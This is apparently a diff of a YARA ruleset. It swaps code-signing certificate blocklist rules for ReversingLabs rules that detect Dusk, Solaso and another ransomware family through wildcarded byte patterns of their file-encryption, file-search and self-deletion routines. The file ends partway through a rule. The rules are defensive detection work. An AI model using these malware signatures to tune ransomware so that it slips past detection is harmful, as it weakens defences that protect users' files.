-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CUS Software GmbH" and pe.signatures [ i ] . serial == "3a:d6:0c:ea:73:e1:dd:1a:3e:6c:02:d9:b3:39:c3:80" and 1567036800 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_7Df2Dfed47C6Fd6542131847Cffbc102 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "306444d8-7573-58c6-b6fe-14d701942275"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L3360-L3376"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "fc6adbfd45ff6ac465aecb3db862421f02170e977fc044017f3ddc306a9f7a37"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$encrypt_files_p1 = {
+            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 33 C9 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 8D
+            ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 4D ?? 89 4D ?? 89 4D ?? 89 4D ?? 89 4D ?? 89 55 ??
+            89 45 ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 DB 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? 8B
+            45 ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ??
+            ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89
+            85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ??
+            ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ??
+            8B 45 ?? E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 6A ?? 8B 4D ?? B2 ?? A1 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 10 FF 12 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 83
+            BD ?? ?? ?? ?? ?? 75 ?? 83 BD ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? EB ?? 0F 8E ?? ?? ??
+            ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 76 ?? EB ?? 7E ?? C7 85
+            ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? 8B 85 ?? ?? ?? ?? 89 85
+            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8
+            ?? ?? ?? ?? BB ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 8D 85 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 83 FB ?? 7F ?? B8
+        }
+		$encrypt_files_p2 = {
+            E8 ?? ?? ?? ?? 8B D0 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8
+            ?? ?? ?? ?? 43 83 FB ?? 75 ?? 8B 85 ?? ?? ?? ?? 8B D0 8D 45 ?? E8 ?? ?? ?? ?? 8D 45
+            ?? E8 ?? ?? ?? ?? 8B D0 8B 8D ?? ?? ?? ?? 8B 45 ?? 8B 18 FF 53 ?? 83 BD ?? ?? ?? ??
+            ?? 75 ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8D 45 ?? E8 ?? ?? ?? ?? 8B D0 B9 ?? ?? ?? ?? 8B 45 ?? 8B 18 FF 53 ?? EB ?? 8D 45 ??
+            E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 33 D2 8B 45 ?? 8B 08 FF 51 ?? 83
+            BD ?? ?? ?? ?? ?? 75 ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? 8D 45 ?? E8 ?? ?? ?? ??
+            8B D0 B9 ?? ?? ?? ?? 8B 45 ?? 8B 18 FF 53 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 B9
+            ?? ?? ?? ?? 8B 45 ?? 8B 18 FF 53 ?? 55 E8 ?? ?? ?? ?? 59 55 E8 ?? ?? ?? ?? 59 EB ??
+            55 E8 ?? ?? ?? ?? 59 A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 B9 ?? ?? ?? ?? 8B 45 ?? 8B
+            18 FF 53 ?? 55 E8 ?? ?? ?? ?? 59 B3 ?? 8D 45 ?? E8 ?? ?? ?? ?? 84 DB 74 ?? 8D 95 ??
+            ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B 8D ?? ?? ?? ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B
+            F8 57 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 56 57 E8 ?? ?? ?? ?? 33 C0 5A 59 59
+            64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
+        }
+		$find_files = {
+            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 89 55 ?? 89 45 ?? 8B 45 ?? 89 45 ?? 68 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ??
+            ?? 89 C3 85 DB 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 50 FF D3 85 C0 74
+            ?? 8B 45 ?? 50 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45
+            ?? 80 38 ?? 75 ?? 8B 45 ?? 80 78 ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? E8 ?? ??
+            ?? ?? 8B F0 80 3E ?? 0F 84 ?? ?? ?? ?? 8D 46 ?? E8 ?? ?? ?? ?? 8B F0 80 3E ?? 0F 84
+            ?? ?? ?? ?? EB ?? 8B 75 ?? 83 C6 ?? 8B DE 2B 5D ?? 8D 43 ?? 50 8B 45 ?? 50 8D 85 ??
+            ?? ?? ?? 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 46 ?? E8 ?? ?? ?? ?? 8B F8 8B C7 2B C6
+            03 C3 40 3D ?? ?? ?? ?? 0F 8F ?? ?? ?? ?? 8B C7 2B C6 40 50 56 8D 85 ?? ?? ?? ?? 03
+            C3 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 89 45
+            ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ??
+            8D 53 ?? 03 C2 40 3D ?? ?? ?? ?? 7F ?? C6 84 1D ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B C3
+            48 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 03 C3 40 50 E8 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 50 E8 ?? ?? ?? ?? 40 03 D8 8B F7 80 3E ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 50 8D 85
+            ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 5F 5E 5B 8B E5 5D C3
+        }
+		$enum_resources = {
+            55 8B EC 83 C4 ?? 53 56 57 33 D2 89 55 ?? 89 55 ?? 89 55 ?? 33 D2 55 68 ?? ?? ?? ??
+            64 FF 32 64 89 22 33 D2 55 68 ?? ?? ?? ?? 64 FF 32 64 89 22 8D 55 ?? 52 50 6A ?? 6A
+            ?? 6A ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 33 C0 5A 59 59 64 89 10 E9 ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 50 6A ?? E8 ?? ?? ?? ?? 89
+            45 ?? 8D 45 ?? 50 8B 45 ?? 50 8D 45 ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 89 45 ?? 83 7D
+            ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 48 85 C0 0F 82 ?? ?? ?? ?? 40 89 45 ?? 8B 45 ?? 8B
+            58 ?? 85 DB 0F 84 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 45 ?? 8B
+            D3 E8 ?? ?? ?? ?? 8D 45 ?? 8B 55 ?? 0F B6 12 88 50 ?? C6 00 ?? 8D 55 ?? 8D 45 ?? E8
+            ?? ?? ?? ?? 8D 45 ?? 8B 55 ?? 0F B6 52 ?? 88 50 ?? C6 00 ?? 8D 55 ?? 8D 45 ?? B1 ??
+            E8 ?? ?? ?? ?? 8D 55 ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 50 8D 55 ?? B8 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8B 55 ?? 58 E8 ?? ?? ?? ?? 75 ?? A1 ?? ?? ?? ?? 8B 40 ?? 8B 55 ?? 8B
+            08 FF 51 ?? 33 C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? F7
+            40 ?? ?? ?? ?? ?? 76 ?? 8B 45 ?? E8 ?? ?? ?? ?? 83 45 ?? ?? FF 4D ?? 0F 85 ?? ?? ??
+            ?? EB ?? 81 7D ?? ?? ?? ?? ?? 74 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? EB ?? 8B 45 ?? 50 E8
+            ?? ?? ?? ?? 81 7D ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 33 C0
+            5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 50 E8 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ??
+            ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AFVIMPEX SRL" and pe.signatures [ i ] . serial == "7d:f2:df:ed:47:c6:fd:65:42:13:18:47:cf:fb:c1:02" and 1567036800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $enum_resources ) and ( $find_files ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_74Fedf0F8398060Fa8378C6D174465C8 : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Dusk : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Dusk ransomware."
 		author = "ReversingLabs"
-		id = "eea46214-d0f5-5e92-b678-4a1df09025ce"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "cde30f40-f13c-53da-8656-cc293433aa36"
+		date = "2021-08-12"
+		modified = "2021-08-12"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L3378-L3394"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "406821c7990f05fdad91704f6418304f53dd4800bc4b41912177a1695858fade"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/ByteCode.MSIL.Ransomware.Dusk.yara#L1-L73"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "b6b0b3be7c17115dc5f225a13228f8a4811d84ae095c3ceba2d89f569f2d40c7"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Dusk"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files_p1 = {
+            03 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 04 6F ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 06 6F ?? ?? ?? ??
+            0A 06 28 ?? ?? ?? ?? 0B 03 07 28 ?? ?? ?? ?? 03 03 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ??
+            ?? ?? ?? DE ?? 26 DE ?? 2A
+        }
+		$encrypt_files_p2 = {
+            14 0A 1E 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 73 ?? ?? ?? ?? 0C 73 ?? ??
+            ?? ?? 0D 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 03 07 20 ??
+            ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ??
+            ?? ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 17 6F ?? ?? ??
+            ?? 08 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 11 ?? 02 16 02 8E 69 6F ?? ?? ?? ?? 11
+            ?? 6F ?? ?? ?? ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 08 6F ?? ?? ?? ?? 0A DE ??
+            09 2C ?? 09 6F ?? ?? ?? ?? DC 08 2C ?? 08 6F ?? ?? ?? ?? DC 06 2A
+        }
+		$dusk_delete_itself = {
+            72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 1A 8D ?? ?? ?? ?? 25 16
+            72 ?? ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? 03 28 ?? ?? ?? ?? A2 25 18 72 ?? ?? ?? ?? 28 ??
+            ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 25 19 72 ?? ?? ?? ?? A2 0B 06 07 28 ?? ?? ??
+            ?? 06 06 28 ?? ?? ?? ?? 18 60 28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 06 73 ?? ??
+            ?? ?? 25 17 6F ?? ?? ?? ?? 25 16 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 04 28 ?? ?? ?? ?? 28
+            ?? ?? ?? ?? DE ?? 26 DE ?? 2A
+        }
+		$find_files = {
+            20 ?? ?? ?? ?? 72 ?? ?? ?? ?? A2 25 20 ?? ?? ?? ?? 72 ?? ?? ?? ?? A2 25 20 ?? ?? ?? ??
+            72 ?? ?? ?? ?? A2 0A 1F ?? 8D ?? ?? ?? ?? 25 16 1F ?? 28 ?? ?? ?? ?? A2 25 17 1E 28 ??
+            ?? ?? ?? A2 25 18 1F ?? 28 ?? ?? ?? ?? A2 25 19 1F ?? 28 ?? ?? ?? ?? A2 25 1A 1F ?? 28
+            ?? ?? ?? ?? A2 25 1B 1B 28 ?? ?? ?? ?? A2 25 1C 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ??
+            ?? ?? 28 ?? ?? ?? ?? A2 25 1D 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ??
+            ?? A2 25 1E 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 25 1F ?? 72
+            ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 0B 16 0C 2B ?? 07 08 9A 0D
+            1F ?? 28 ?? ?? ?? ?? 13 ?? 09 72 ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11
+            ?? 11 ?? 9A 28 ?? ?? ?? ?? 13 ?? 06 11 ?? 28 ?? ?? ?? ?? 2C ?? 02 11 ?? 11 ?? 9A 11 ??
+            28 ?? ?? ?? ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 32 ?? 00 02 09 28 ?? ?? ?? ?? DE ??
+            26 DE ?? 08 17 58 0C 08 07 8E 69 32 ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 20 ?? ?? ?? ??
+            28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ??
+            ?? 26 DE ?? 26 DE ?? 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 20
+            ?? ?? ?? ?? 6F ?? ?? ?? ?? 2A
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DOCS PTY LTD" and pe.signatures [ i ] . serial == "74:fe:df:0f:83:98:06:0f:a8:37:8c:6d:17:44:65:c8" and 1566172800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( $dusk_delete_itself )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_3Bd6A5Bba28E7C1Ca44880159Dace237 : INFO FILE
+rule REVERSINGLABS_Win64_Ransomware_Solaso : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Solaso ransomware."
 		author = "ReversingLabs"
-		id = "c80245bd-908a-5b89-92e3-af0dd7bed63a"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "53f56ad8-ccdf-58f0-a5d9-e58f2c18ac76"
+		date = "2021-11-02"
+		modified = "2021-11-02"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L3396-L3412"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "f885c782148947d09133a3cc65319e02204c21d6c6d911b360840f25f37601dc"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win64.Ransomware.Solaso.yara#L1-L171"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "368a80a9f2e264d17c61d6ed4c22baec838ba0b0bc2e5c79344830bf861aa5a2"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Solaso"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files_p1 = {
+            C6 85 ?? ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 45 ?? 4C 89 AD ?? ?? ?? ?? 48 8D 85
+            ?? ?? ?? ?? 48 89 45 ?? B1 ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 8D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 90 4C 8D 05 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 90 48 8D 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8D
+            85 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B BD
+            ?? ?? ?? ?? 4C 8B BD ?? ?? ?? ?? 49 3B FF 0F 84 ?? ?? ?? ?? 66 0F 1F 44 00 ?? 48 8D
+            95 ?? ?? ?? ?? 48 8B CF E8 ?? ?? ?? ?? 90 48 8D 95 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ??
+            ?? 48 0F 43 95 ?? ?? ?? ?? 4C 8B 85 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ??
+            48 8B C8 E8 ?? ?? ?? ?? 4C 89 AD ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85
+            ?? ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 48 0F 43 95 ?? ?? ?? ??
+            4C 8B 85 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B CF 48 83 7F ?? ?? 72
+            ?? 48 8B 0F BA ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ??
+            48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 44 24 ?? 4C 89 AD ??
+            ?? ?? ?? 4C 89 AD ?? ?? ?? ?? 48 8B B5 ?? ?? ?? ?? 4C 8D B5 ?? ?? ?? ?? 48 83 BD ??
+            ?? ?? ?? ?? 4C 0F 43 B5 ?? ?? ?? ?? 48 83 FE ?? 73 ?? 41 0F 10 06 0F 11 85 ?? ?? ??
+            ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48
+        }
+		$find_files_p2 = {
+            8B DE 48 83 CB ?? 48 3B D8 48 0F 47 D8 48 8D 4B ?? 48 81 F9 ?? ?? ?? ?? 72 ?? 48 8D
+            41 ?? 48 3B C1 0F 86 ?? ?? ?? ?? 0F AE E8 48 8B C8 E8 ?? ?? ?? ?? 48 8B C8 48 85 C0
+            0F 84 ?? ?? ?? ?? 48 83 C0 ?? 48 83 E0 ?? 48 89 48 ?? EB ?? 48 85 C9 74 ?? 0F AE E8
+            E8 ?? ?? ?? ?? EB ?? 49 8B C5 48 89 85 ?? ?? ?? ?? 4C 8D 46 ?? 49 8B D6 48 8B C8 E8
+            ?? ?? ?? ?? 48 89 9D ?? ?? ?? ?? 48 89 B5 ?? ?? ?? ?? 4C 89 6D ?? 4C 89 6D ?? 48 8B
+            B5 ?? ?? ?? ?? 4C 8D B5 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 4C 0F 43 B5 ?? ?? ?? ??
+            48 83 FE ?? 73 ?? 41 0F 10 06 0F 11 45 ?? 48 C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 48
+            B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 45 ?? 48 8B DE 48 83 CB ?? 48 89 5D ?? 48 3B D8 48
+            0F 47 D8 48 8D 4B ?? 48 81 F9 ?? ?? ?? ?? 72 ?? 48 8D 41 ?? 48 3B C1 0F 86 ?? ?? ??
+            ?? 0F AE E8 48 8B C8 E8 ?? ?? ?? ?? 48 8B C8 48 85 C0 0F 84 ?? ?? ?? ?? 48 83 C0 ??
+            48 83 E0 ?? 48 89 48 ?? EB ?? 48 85 C9 74 ?? 0F AE E8 E8 ?? ?? ?? ?? EB ?? 49 8B C5
+            48 89 45 ?? 4C 8D 46 ?? 49 8B D6 48 8B C8 E8 ?? ?? ?? ?? 48 89 5D ?? 48 89 75 ?? 4C
+            8D 85 ?? ?? ?? ?? 48 8D 55 ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 8D
+        }
+		$encrypt_files_p1 = {
+            48 63 53 ?? 48 89 B5 ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? 45 33
+            C0 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 8D 55 ?? 48 83 BD ?? ?? ?? ?? ?? 48 0F 43 55 ??
+            4C 63 43 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 89 4B ?? 48 85 C9 0F 84
+            ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 3B CA 77 ?? 48 89 8D ?? ?? ?? ?? 48 8D 45 ?? 48
+            83 BD ?? ?? ?? ?? ?? 48 0F 43 45 ?? C6 04 01 ?? EB ?? 48 8B F1 48 2B F2 4C 8B 85 ??
+            ?? ?? ?? 49 8B C0 48 2B C2 48 3B F0 77 ?? 48 89 8D ?? ?? ?? ?? 48 8D 7D ?? 49 83 F8
+            ?? 48 0F 43 7D ?? 48 03 FA 4C 8B C6 33 D2 48 8B CF E8 ?? ?? ?? ?? C6 04 37 ?? EB ??
+            0F AE E8 C6 44 24 ?? ?? 4C 8B CE 48 8B D6 48 8D 4D ?? E8 ?? ?? ?? ?? 33 F6 8B 43 ??
+            99 41 F7 FD B9 ?? ?? ?? ?? 85 C0 0F 45 C8 89 4B ?? 83 F9 ?? 0F 8C ?? ?? ?? ?? 4C 63
+            C9 4C 8D 45 ?? 48 8D 54 24 ?? E8 ?? ?? ?? ?? 48 8B F8 48 3B D8 74 ?? 48 8B 0B 48 85
+        }
+		$encrypt_files_p2 = {
+            C9 74 ?? 48 8B 53 ?? E8 ?? ?? ?? ?? 48 8B 0B 48 8B 53 ?? 48 2B D1 48 83 E2 ?? 48 81
+            FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 4C 8B 41 ?? 49 2B C8 48 8D 41 ?? 48 83 F8 ?? 0F 87
+            ?? ?? ?? ?? 49 8B C8 E8 ?? ?? ?? ?? 48 89 33 48 89 73 ?? 48 89 73 ?? 48 8B 07 48 89
+            03 48 8B 47 ?? 48 89 43 ?? 48 8B 47 ?? 48 89 43 ?? 48 89 37 48 89 77 ?? 48 89 77 ??
+            48 8B 4C 24 ?? 48 85 C9 74 ?? 48 8B 54 24 ?? E8 ?? ?? ?? ?? 48 8B 54 24 ?? 48 8B 4C
+            24 ?? 48 2B D1 48 83 E2 ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49
+            ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 74 24 ??
+            0F 57 C0 F3 0F 7F 44 24 ?? EB ?? 48 8B 0B 48 8D 45 ?? 48 3B C8 74 ?? 48 8D 55 ?? 48
+            83 BD ?? ?? ?? ?? ?? 48 0F 43 55 ?? 4C 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B CB E8
+            ?? ?? ?? ?? 45 33 C0 48 8D 15 ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 83 7B ?? ?? 74
+            ?? 33 FF 0F 1F 40 ?? 66 0F 1F 84 00 ?? ?? 00 00 4C 8B 03 4C 03 C7 49 8B D0 49 83 78
+            ?? ?? 72 ?? 49 8B 10 4D 8B 40 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 48 63 CE 48 C1 E1 ?? 48
+        }
+		$encrypt_files_p3 = {
